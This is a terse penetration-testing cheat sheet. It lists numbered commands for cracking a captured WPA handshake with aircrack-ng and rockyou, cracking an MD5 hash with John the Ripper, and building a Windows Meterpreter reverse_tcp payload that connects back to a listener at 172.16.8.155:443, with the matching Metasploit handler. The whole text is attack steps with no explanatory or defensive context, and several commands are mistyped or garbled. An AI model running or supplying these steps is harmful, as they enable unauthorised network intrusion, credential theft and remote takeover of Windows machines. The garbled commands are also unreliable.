#air

1.iwconfig eth0
2.iwlist wlan0 scanning wlan0
3.airmon-ng start wlan0
4.airmon-ng check kill
5.airmon-ng start wlan0 PHY
6.airodump-ng -w atheros -c 6 --bssid 14:F6:5A:F4:57:22 wlanomon CH 6
7.ls -l total
8.aircrack-ng -a 2 atheros-01.cap -w/usr/share/wordlists/rockyou.txt


#hash
1. sudo apt-get install john
2. echo -n 12345678|md5sum|awk '{print $1}' > hashes.txt
3.cat hashes.txt
4.john --format=raw.md5 --wordlists=/usr/share/wordlists/rockyou.txt hashes.txt

#msf

1.msf -p windows/meterpreter/reverse_tcp LHOSTS=172.16.8.155 LPORT=443 -f exe > /root/hi.exe
2.msfconsole
3.use exploit/multi/handler
4.set payload windows/meterpreter/reverse_tcp
5.show options
6.set LHOST 172.16.8.155
7.set LPORT 443
8.exploit

